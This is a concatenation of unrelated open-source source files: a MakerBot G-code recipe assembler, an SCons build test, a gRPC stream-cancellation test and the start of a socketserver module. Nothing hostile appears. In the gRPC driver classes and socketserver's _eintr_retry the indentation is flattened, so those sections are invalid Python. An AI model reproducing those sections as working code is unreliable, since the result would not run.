        :param profiledir: Unused; retained for backward compatibility.
        """
        self.machine_profile = machine_profile
        # Fixed ordering of routine slots within each sequence.
        self.start_order = [
            'begin_print',
            'homing',
            'start_position',
            'heat_platform',
            'heat_tools',
            'end_start_sequence',
        ]
        self.end_order = [
            'end_position',
            'cool_platform',
            'cool_tools',
            'end_print',
        ]
        self.recipes = GcodeRecipes
    def assemble_recipe(self,
                        material='PLA',
                        tool_0=True,
                        tool_1=False,
                        begin_print='replicator_begin',
                        homing='replicator_homing',
                        start_position='replicator_start_position',
                        end_start_sequence='replicator_end_start_sequence',
                        end_position='replicator_end_position',
                        end_print='replicator_end',
                        heat_platform_override=False,
                        no_heat_platform_override=False,
                        ):
        """
        The recipe assembler. Has several built in
        defaults a user could use to create a generic
        sequence recipe. If both tool_0 and tool_1 are
        set to true, will assume it should output in
        dualstrusion mode.
        @return dict start_recipe: The recipe used to
        build the print start sequence.
        @return dict end_recipe: The recipe used to
        build the print end sequence.
        @return dict variables: The default variables
        used by the gcode parser.
        """
        start_recipe = {}
        end_recipe = {}
        variables = {}
        # Tool selection: both tools active means dualstrusion mode.
        if tool_0 and tool_1:
            dual_start_recipe, dual_end_recipe, dual_variables = self.get_recipes_and_variables('dualstrusion')
            start_recipe.update(dual_start_recipe)
            end_recipe.update(dual_end_recipe)
            variables.update(dual_variables)
        elif tool_0:
            start_recipe.update({'heat_tools': 'heat_0'})
            end_recipe.update({'cool_tools': 'cool_0'})
        elif tool_1:
            start_recipe.update({'heat_tools': 'heat_1'})
            end_recipe.update({'cool_tools': 'cool_1'})
        # Layer the material's routines and variables on top.
        mat_start_recipe, mat_end_recipe, mat_variables = self.get_recipes_and_variables(material)
        start_recipe.update(mat_start_recipe)
        end_recipe.update(mat_end_recipe)
        variables.update(mat_variables)
        start_recipe.update({
            'begin_print': begin_print,
            'homing': homing,
            'start_position': start_position,
            'end_start_sequence': end_start_sequence,
        })
        end_recipe.update({
            'end_position': end_position,
            'end_print': end_print
        })
        # Explicit overrides win over whatever the material recipe chose.
        if heat_platform_override:
            start_recipe.update({'heat_platform': 'heat_platform'})
            end_recipe.update({'cool_platform': 'cool_platform'})
        if no_heat_platform_override:
            start_recipe.update({'heat_platform': None})
            end_recipe.update({'cool_platform': None})
        return start_recipe, end_recipe, variables
    def assemble_start_sequence(self, recipe):
        """
        Given a start recipe, assembles the correct sequence
        @param recipe: The recipe used to create the sequence
        @return list gcodes: Sequence of gcodes derived from the recipe
        """
        order = self.start_order
        template_name = 'print_start_sequence'
        gcodes = self.assemble_sequence_from_recipe(
            recipe, template_name, order)
        return gcodes
    def assemble_end_sequence(self, recipe):
        """
        Given an end recipe, assembles the correct sequence
        @param recipe: The recipe used to create the sequence
        @return list gcodes: Sequence of gcodes derived from the recipe
        """
        order = self.end_order
        template_name = 'print_end_sequence'
        gcodes = self.assemble_sequence_from_recipe(
            recipe, template_name, order)
        return gcodes
    def assemble_sequence_from_recipe(self, recipe, template_name, order):
        """
        Given a recipe, template_name and ordering creates the correct
        sequence.
        @param recipe: The recipe used to create the sequence
        @param template_name: The name of the template we want to use (start/end)
        @param order: The correct ordering of routines
        @return list gcodes: Sequence of gcodes derived from the recipe.
        """
        gcodes = []
        template = self.machine_profile.values[template_name]
        for routine in order:
            # A recipe entry of None means "skip this slot entirely".
            if recipe[routine] is not None:
                gcodes.extend(template[routine][recipe[routine]])
        return gcodes
    def get_recipes_and_variables(self, key):
        """
        Given a recipe (i.e. PLA, ABS, dualstrusion), gets its start
        routines, end routines and variables.
        @param key: Name of the recipe we want to access
        @return dict start_routines: The start routines associated with this key
        @return dict end_routines: The end routines associated with this key
        @return dict variables: The variables associated with this key
        """
        # Idiomatic membership test (was "if not key in self.recipes").
        if key not in self.recipes:
            raise makerbot_driver.RecipeNotFoundError
        values = self.recipes[key]
        start_routines = values['print_start_sequence']
        end_routines = values['print_end_sequence']
        variables = values['variables']
        return start_routines, end_routines, variables
| agpl-3.0 |
datalogics-robb/scons | test/Value.py | 2 | 4889 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import re
import string
import sys
import TestSCons
import TestCmd
_python_ = TestSCons._python_
test = TestSCons.TestSCons(match=TestCmd.match_re)
# Run all of the tests with both types of source signature
# to make sure there's no difference in behavior.
for source_signature in ['MD5', 'timestamp']:
    print "Testing Value node with source signatures:", source_signature
    test.write('SConstruct', """
SourceSignatures(r'%(source_signature)s')
class Custom:
    def __init__(self, value): self.value = value
    def __str__(self): return "C=" + str(self.value)
P = ARGUMENTS.get('prefix', '/usr/local')
L = len(P)
C = Custom(P)
def create(target, source, env):
    open(str(target[0]), 'wb').write(source[0].get_contents())
env = Environment()
env['BUILDERS']['B'] = Builder(action = create)
env['BUILDERS']['S'] = Builder(action = '%(_python_)s put $SOURCES into $TARGET')
env.B('f1.out', Value(P))
env.B('f2.out', env.Value(L))
env.B('f3.out', Value(C))
env.S('f4.out', Value(L))
def create_value (target, source, env):
    target[0].write(source[0].get_contents ())
def create_value_file (target, source, env):
    open(str(target[0]), 'wb').write(source[0].read())
env['BUILDERS']['B2'] = Builder(action = create_value)
env['BUILDERS']['B3'] = Builder(action = create_value_file)
V = Value('my value')
env.B2(V, 'f3.out')
env.B3('f5.out', V)
""" % locals())
    test.write('put', """
import os
import string
import sys
open(sys.argv[-1],'wb').write(string.join(sys.argv[1:-2]))
""")
    # Clean, then do a full build and check the builder call trace.
    test.run(arguments='-c')
    test.run()
    out7 = """create_value(["'my value'"], ["f3.out"])"""
    out8 = """create_value_file(["f5.out"], ["'my value'"])"""
    out1 = """create(["f1.out"], ["'/usr/local'"])"""
    out2 = """create(["f2.out"], ["10"])"""
    out3 = """create\\(\\["f3.out"\\], \\["<.*.Custom instance at """
    #" <- unconfuses emacs syntax highlighting
    test.fail_test(string.find(test.stdout(), out1) == -1)
    test.fail_test(string.find(test.stdout(), out2) == -1)
    test.fail_test(string.find(test.stdout(), out7) == -1)
    test.fail_test(string.find(test.stdout(), out8) == -1)
    test.fail_test(re.search(out3, test.stdout()) == None)
    test.must_match('f1.out', "/usr/local")
    test.must_match('f2.out', "10")
    test.must_match('f3.out', "C=/usr/local")
    test.must_match('f4.out', '10')
    test.must_match('f5.out', "C=/usr/local")
    test.up_to_date(arguments='.')
    # Changing the Value (via the prefix argument) must trigger rebuilds.
    test.run(arguments='prefix=/usr')
    out4 = """create(["f1.out"], ["'/usr'"])"""
    out5 = """create(["f2.out"], ["4"])"""
    out6 = """create\\(\\["f3.out"\\], \\["<.*.Custom instance at """
    #" <- unconfuses emacs syntax highlighting
    test.fail_test(string.find(test.stdout(), out4) == -1)
    test.fail_test(string.find(test.stdout(), out5) == -1)
    test.fail_test(re.search(out6, test.stdout()) == None)
    test.must_match('f1.out', "/usr")
    test.must_match('f2.out', "4")
    test.must_match('f3.out', "C=/usr")
    test.must_match('f4.out', '4')
    test.up_to_date('prefix=/usr', '.')
    # Remove one target and change the Value again: only affected
    # targets should be rebuilt (f2.out's length is unchanged).
    test.unlink('f3.out')
    test.run(arguments='prefix=/var')
    out4 = """create(["f1.out"], ["'/var'"])"""
    test.fail_test(string.find(test.stdout(), out4) == -1)
    test.fail_test(string.find(test.stdout(), out5) != -1)
    test.fail_test(string.find(test.stdout(), out7) == -1)
    test.fail_test(string.find(test.stdout(), out8) == -1)
    test.fail_test(re.search(out6, test.stdout()) == None)
    test.up_to_date('prefix=/var', '.')
    test.must_match('f1.out', "/var")
    test.must_match('f2.out', "4")
    test.must_match('f3.out', "C=/var")
    test.must_match('f4.out', "4")
    test.must_match('f5.out', "C=/var")
test.pass_test()
| mit |
baylabs/grpc | src/python/grpcio_tests/tests/unit/_cython/_read_some_but_not_all_responses_test.py | 21 | 11192 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test a corner-case at the level of the Cython API."""
import threading
import unittest
from grpc._cython import cygrpc
# Deadline far enough in the future that calls never time out in this test.
_INFINITE_FUTURE = cygrpc.Timespec(float('+inf'))
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
class _ServerDriver(object):
def __init__(self, completion_queue, shutdown_tag):
self._condition = threading.Condition()
self._completion_queue = completion_queue
self._shutdown_tag = shutdown_tag
self._events = []
self._saw_shutdown_tag = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._condition.notify()
if event.tag is self._shutdown_tag:
self._saw_shutdown_tag = True
break
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._saw_shutdown_tag
def first_event(self):
with self._condition:
while not self._events:
self._condition.wait()
return self._events[0]
def events(self):
with self._condition:
while not self._saw_shutdown_tag:
self._condition.wait()
return tuple(self._events)
class _QueueDriver(object):
def __init__(self, condition, completion_queue, due):
self._condition = condition
self._completion_queue = completion_queue
self._due = due
self._events = []
self._returned = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._due.remove(event.tag)
self._condition.notify_all()
if not self._due:
self._returned = True
return
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._returned
def event_with_tag(self, tag):
with self._condition:
while True:
for event in self._events:
if event.tag is tag:
return event
self._condition.wait()
def events(self):
with self._condition:
while not self._returned:
self._condition.wait()
return tuple(self._events)
class ReadSomeButNotAllResponsesTest(unittest.TestCase):
    """Regression test: a client cancels a response-streaming RPC after
    reading only some of the server's messages; nothing should hang."""
    def testReadSomeButNotAllResponses(self):
        # --- Bring up server, channel, and their driver threads ---------
        server_completion_queue = cygrpc.CompletionQueue()
        server = cygrpc.Server(cygrpc.ChannelArgs([]))
        server.register_completion_queue(server_completion_queue)
        port = server.add_http2_port(b'[::]:0')
        server.start()
        channel = cygrpc.Channel('localhost:{}'.format(port).encode(),
                                 cygrpc.ChannelArgs([]))
        server_shutdown_tag = 'server_shutdown_tag'
        server_driver = _ServerDriver(server_completion_queue,
                                      server_shutdown_tag)
        server_driver.start()
        client_condition = threading.Condition()
        client_due = set()
        client_completion_queue = cygrpc.CompletionQueue()
        client_driver = _QueueDriver(client_condition, client_completion_queue,
                                     client_due)
        client_driver.start()
        # --- Server-side call queue and the four tags it must complete --
        server_call_condition = threading.Condition()
        server_send_initial_metadata_tag = 'server_send_initial_metadata_tag'
        server_send_first_message_tag = 'server_send_first_message_tag'
        server_send_second_message_tag = 'server_send_second_message_tag'
        server_complete_rpc_tag = 'server_complete_rpc_tag'
        server_call_due = set(
            (server_send_initial_metadata_tag, server_send_first_message_tag,
             server_send_second_message_tag, server_complete_rpc_tag,))
        server_call_completion_queue = cygrpc.CompletionQueue()
        server_call_driver = _QueueDriver(server_call_condition,
                                          server_call_completion_queue,
                                          server_call_due)
        server_call_driver.start()
        server_rpc_tag = 'server_rpc_tag'
        request_call_result = server.request_call(server_call_completion_queue,
                                                  server_completion_queue,
                                                  server_rpc_tag)
        # --- Client starts the RPC and its receive/complete batches -----
        client_call = channel.create_call(None, _EMPTY_FLAGS,
                                          client_completion_queue, b'/twinkies',
                                          None, _INFINITE_FUTURE)
        client_receive_initial_metadata_tag = 'client_receive_initial_metadata_tag'
        client_complete_rpc_tag = 'client_complete_rpc_tag'
        with client_condition:
            client_receive_initial_metadata_start_batch_result = (
                client_call.start_client_batch(
                    cygrpc.Operations([
                        cygrpc.operation_receive_initial_metadata(_EMPTY_FLAGS),
                    ]), client_receive_initial_metadata_tag))
            client_due.add(client_receive_initial_metadata_tag)
            client_complete_rpc_start_batch_result = (
                client_call.start_client_batch(
                    cygrpc.Operations([
                        cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
                                                               _EMPTY_FLAGS),
                        cygrpc.operation_send_close_from_client(_EMPTY_FLAGS),
                        cygrpc.operation_receive_status_on_client(_EMPTY_FLAGS),
                    ]), client_complete_rpc_tag))
            client_due.add(client_complete_rpc_tag)
        # --- Server sends initial metadata and the first message --------
        server_rpc_event = server_driver.first_event()
        with server_call_condition:
            server_send_initial_metadata_start_batch_result = (
                server_rpc_event.operation_call.start_server_batch([
                    cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
                                                           _EMPTY_FLAGS),
                ], server_send_initial_metadata_tag))
            server_send_first_message_start_batch_result = (
                server_rpc_event.operation_call.start_server_batch([
                    cygrpc.operation_send_message(b'\x07', _EMPTY_FLAGS),
                ], server_send_first_message_tag))
        server_send_initial_metadata_event = server_call_driver.event_with_tag(
            server_send_initial_metadata_tag)
        server_send_first_message_event = server_call_driver.event_with_tag(
            server_send_first_message_tag)
        # --- Server sends a second message and completes the RPC --------
        with server_call_condition:
            server_send_second_message_start_batch_result = (
                server_rpc_event.operation_call.start_server_batch([
                    cygrpc.operation_send_message(b'\x07', _EMPTY_FLAGS),
                ], server_send_second_message_tag))
            server_complete_rpc_start_batch_result = (
                server_rpc_event.operation_call.start_server_batch([
                    cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
                    cygrpc.operation_send_status_from_server(
                        cygrpc.Metadata(()), cygrpc.StatusCode.ok,
                        b'test details', _EMPTY_FLAGS),
                ], server_complete_rpc_tag))
        server_send_second_message_event = server_call_driver.event_with_tag(
            server_send_second_message_tag)
        server_complete_rpc_event = server_call_driver.event_with_tag(
            server_complete_rpc_tag)
        server_call_driver.events()
        # --- Client reads only the FIRST message, then cancels ----------
        with client_condition:
            client_receive_first_message_tag = 'client_receive_first_message_tag'
            client_receive_first_message_start_batch_result = (
                client_call.start_client_batch(
                    cygrpc.Operations([
                        cygrpc.operation_receive_message(_EMPTY_FLAGS),
                    ]), client_receive_first_message_tag))
            client_due.add(client_receive_first_message_tag)
        client_receive_first_message_event = client_driver.event_with_tag(
            client_receive_first_message_tag)
        client_call_cancel_result = client_call.cancel()
        client_driver.events()
        # --- Tear down the server and verify every batch started OK -----
        server.shutdown(server_completion_queue, server_shutdown_tag)
        server.cancel_all_calls()
        server_driver.events()
        self.assertEqual(cygrpc.CallError.ok, request_call_result)
        self.assertEqual(cygrpc.CallError.ok,
                         server_send_initial_metadata_start_batch_result)
        self.assertEqual(cygrpc.CallError.ok,
                         client_receive_initial_metadata_start_batch_result)
        self.assertEqual(cygrpc.CallError.ok,
                         client_complete_rpc_start_batch_result)
        self.assertEqual(cygrpc.CallError.ok, client_call_cancel_result)
        self.assertIs(server_rpc_tag, server_rpc_event.tag)
        self.assertEqual(cygrpc.CompletionType.operation_complete,
                         server_rpc_event.type)
        self.assertIsInstance(server_rpc_event.operation_call, cygrpc.Call)
        self.assertEqual(0, len(server_rpc_event.batch_operations))
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main(verbosity=2)
| bsd-3-clause |
cnoviello/micropython | tests/bytecode/pylib-tests/socketserver.py | 24 | 24196 | """Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>)
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
saves some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneously to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import select
import sys
import os
import errno
try:
    import threading
except ImportError:
    # Fall back to the no-op threading API on builds without threads.
    import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
           "ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
           "StreamRequestHandler","DatagramRequestHandler",
           "ThreadingMixIn", "ForkingMixIn"]
# Unix-domain server classes exist only where the platform has AF_UNIX.
if hasattr(socket, "AF_UNIX"):
    __all__.extend(["UnixStreamServer","UnixDatagramServer",
                    "ThreadingUnixStreamServer",
                    "ThreadingUnixDatagramServer"])
def _eintr_retry(func, *args):
"""restart a system call interrupted by EINTR"""
while True:
try:
return func(*args)
except OSError as e:
if e.errno != errno.EINTR:
raise
class BaseServer:
    """Base class for server classes.
    Methods for the caller:
    - __init__(server_address, RequestHandlerClass)
    - serve_forever(poll_interval=0.5)
    - shutdown()
    - handle_request()  # if you do not use serve_forever()
    - fileno() -> int   # for select()
    Methods that may be overridden:
    - server_bind()
    - server_activate()
    - get_request() -> request, client_address
    - handle_timeout()
    - verify_request(request, client_address)
    - server_close()
    - process_request(request, client_address)
    - shutdown_request(request)
    - close_request(request)
    - service_actions()
    - handle_error()
    Methods for derived classes:
    - finish_request(request, client_address)
    Class variables that may be overridden by derived classes or
    instances:
    - timeout
    - address_family
    - socket_type
    - allow_reuse_address
    Instance variables:
    - RequestHandlerClass
    - socket
    """
    timeout = None
    def __init__(self, server_address, RequestHandlerClass):
        """Constructor.  May be extended, do not override."""
        self.server_address = server_address
        self.RequestHandlerClass = RequestHandlerClass
        # Signals that serve_forever() has fully exited.
        self.__is_shut_down = threading.Event()
        # Polled by serve_forever(); set by shutdown().
        self.__shutdown_request = False
    def server_activate(self):
        """Called by constructor to activate the server.
        May be overridden.
        """
        pass
    def serve_forever(self, poll_interval=0.5):
        """Handle one request at a time until shutdown.
        Polls for shutdown every poll_interval seconds. Ignores
        self.timeout. If you need to do periodic tasks, do them in
        another thread.
        """
        self.__is_shut_down.clear()
        try:
            while not self.__shutdown_request:
                # XXX: Consider using another file descriptor or
                # connecting to the socket to wake this up instead of
                # polling. Polling reduces our responsiveness to a
                # shutdown request and wastes cpu at all other times.
                r, w, e = _eintr_retry(select.select, [self], [], [],
                                       poll_interval)
                if self in r:
                    self._handle_request_noblock()
                self.service_actions()
        finally:
            self.__shutdown_request = False
            # Unblock any thread waiting inside shutdown().
            self.__is_shut_down.set()
    def shutdown(self):
        """Stops the serve_forever loop.
        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()
    def service_actions(self):
        """Called by the serve_forever() loop.
        May be overridden by a subclass / Mixin to implement any code that
        needs to be run during the loop.
        """
        pass
    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary.  Remember:
    #
    # - handle_request() is the top-level call.  It calls
    #   select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    #   or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    #   this constructor will handle the request all by itself
    def handle_request(self):
        """Handle one request, possibly blocking.
        Respects self.timeout.
        """
        # Support people who used socket.settimeout() to escape
        # handle_request before self.timeout was available.
        timeout = self.socket.gettimeout()
        if timeout is None:
            timeout = self.timeout
        elif self.timeout is not None:
            # Honor the stricter of the socket timeout and self.timeout.
            timeout = min(timeout, self.timeout)
        fd_sets = _eintr_retry(select.select, [self], [], [], timeout)
        if not fd_sets[0]:
            self.handle_timeout()
            return
        self._handle_request_noblock()
    def _handle_request_noblock(self):
        """Handle one request, without blocking.
        I assume that select.select has returned that the socket is
        readable before this function was called, so there should be
        no risk of blocking in get_request().
        """
        try:
            request, client_address = self.get_request()
        except socket.error:
            # The peer may have gone away between select() and accept().
            return
        if self.verify_request(request, client_address):
            try:
                self.process_request(request, client_address)
            except:
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    def handle_timeout(self):
        """Called if no new request arrives within self.timeout.
        Overridden by ForkingMixIn.
        """
        pass
    def verify_request(self, request, client_address):
        """Verify the request.  May be overridden.
        Return True if we should proceed with this request.
        """
        return True
    def process_request(self, request, client_address):
        """Call finish_request.
        Overridden by ForkingMixIn and ThreadingMixIn.
        """
        self.finish_request(request, client_address)
        self.shutdown_request(request)
    def server_close(self):
        """Called to clean-up the server.
        May be overridden.
        """
        pass
    def finish_request(self, request, client_address):
        """Finish one request by instantiating RequestHandlerClass."""
        self.RequestHandlerClass(request, client_address, self)
    def shutdown_request(self, request):
        """Called to shutdown and close an individual request."""
        self.close_request(request)
    def close_request(self, request):
        """Called to clean up an individual request."""
        pass
    def handle_error(self, request, client_address):
        """Handle an error gracefully.  May be overridden.
        The default is to print a traceback and continue.
        """
        print('-'*40)
        print('Exception happened during processing of request from', end=' ')
        print(client_address)
        import traceback
        traceback.print_exc() # XXX But this goes to stderr!
        print('-'*40)
class TCPServer(BaseServer):
    """Base class for various socket-based server classes.
    Defaults to synchronous IP stream (i.e., TCP).
    Methods for the caller:
    - __init__(server_address, RequestHandlerClass, bind_and_activate=True)
    - serve_forever(poll_interval=0.5)
    - shutdown()
    - handle_request()  # if you don't use serve_forever()
    - fileno() -> int   # for select()
    Methods that may be overridden:
    - server_bind()
    - server_activate()
    - get_request() -> request, client_address
    - handle_timeout()
    - verify_request(request, client_address)
    - process_request(request, client_address)
    - shutdown_request(request)
    - close_request(request)
    - handle_error()
    Methods for derived classes:
    - finish_request(request, client_address)
    Class variables that may be overridden by derived classes or
    instances:
    - timeout
    - address_family
    - socket_type
    - request_queue_size (only for stream sockets)
    - allow_reuse_address
    Instance variables:
    - server_address
    - RequestHandlerClass
    - socket
    """
    address_family = socket.AF_INET
    socket_type = socket.SOCK_STREAM
    request_queue_size = 5
    allow_reuse_address = False
    def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
        """Constructor.  May be extended, do not override."""
        BaseServer.__init__(self, server_address, RequestHandlerClass)
        self.socket = socket.socket(self.address_family,
                                    self.socket_type)
        if bind_and_activate:
            # Close the freshly created socket if binding or activation
            # fails, so a failed constructor does not leak the file
            # descriptor (e.g. when the port is already in use).
            try:
                self.server_bind()
                self.server_activate()
            except:
                self.server_close()
                raise
    def server_bind(self):
        """Called by constructor to bind the socket.
        May be overridden.
        """
        if self.allow_reuse_address:
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.server_address)
        # Re-read the address: bind() may have filled in an ephemeral port.
        self.server_address = self.socket.getsockname()
    def server_activate(self):
        """Called by constructor to activate the server.
        May be overridden.
        """
        self.socket.listen(self.request_queue_size)
    def server_close(self):
        """Called to clean-up the server.
        May be overridden.
        """
        self.socket.close()
    def fileno(self):
        """Return socket file number.
        Interface required by select().
        """
        return self.socket.fileno()
    def get_request(self):
        """Get the request and client address from the socket.
        May be overridden.
        """
        return self.socket.accept()
    def shutdown_request(self, request):
        """Called to shutdown and close an individual request."""
        try:
            #explicitly shutdown.  socket.close() merely releases
            #the socket and waits for GC to perform the actual close.
            request.shutdown(socket.SHUT_WR)
        except socket.error:
            pass #some platforms may raise ENOTCONN here
        self.close_request(request)
    def close_request(self, request):
        """Called to clean up an individual request."""
        request.close()
class UDPServer(TCPServer):
    """UDP server class.

    Each request is a single datagram: the "request" object handed to the
    handler is the (data, socket) pair rather than a connected socket.
    """
    allow_reuse_address = False
    socket_type = socket.SOCK_DGRAM
    # Largest datagram accepted in a single recvfrom() call.
    max_packet_size = 8192
    def get_request(self):
        """Receive one datagram; return ((data, socket), client_address)."""
        payload, sender = self.socket.recvfrom(self.max_packet_size)
        return (payload, self.socket), sender
    def server_activate(self):
        """Datagram sockets are connectionless; listen() does not apply."""
        pass
    def shutdown_request(self, request):
        """There is no connection to shut down; just clean up."""
        self.close_request(request)
    def close_request(self, request):
        """Nothing to release for a datagram "request"."""
        pass
class ForkingMixIn:
    """Mix-in class to handle each request in a new process."""
    # Seconds of inactivity before handle_timeout() reaps zombie children.
    timeout = 300
    # List of child PIDs; lazily created on the first fork.
    active_children = None
    max_children = 40
    def collect_children(self):
        """Internal routine to wait for children that have exited."""
        if self.active_children is None: return
        while len(self.active_children) >= self.max_children:
            # XXX: This will wait for any child process, not just ones
            # spawned by this library. This could confuse other
            # libraries that expect to be able to wait for their own
            # children.
            try:
                pid, status = os.waitpid(0, 0)
            except os.error:
                pid = None
            if pid not in self.active_children: continue
            self.active_children.remove(pid)
        # XXX: This loop runs more system calls than it ought
        # to. There should be a way to put the active_children into a
        # process group and then use os.waitpid(-pgid) to wait for any
        # of that set, but I couldn't find a way to allocate pgids
        # that couldn't collide.
        for child in self.active_children:
            try:
                pid, status = os.waitpid(child, os.WNOHANG)
            except os.error:
                pid = None
            if not pid: continue
            try:
                self.active_children.remove(pid)
            except ValueError as e:
                # Fixed: ValueError has no .message attribute on Python 3
                # (this module otherwise targets Python 3); format the
                # exception itself instead.
                raise ValueError('%s. x=%d and list=%r' % (e, pid,
                                                           self.active_children))
    def handle_timeout(self):
        """Wait for zombies after self.timeout seconds of inactivity.
        May be extended, do not override.
        """
        self.collect_children()
    def service_actions(self):
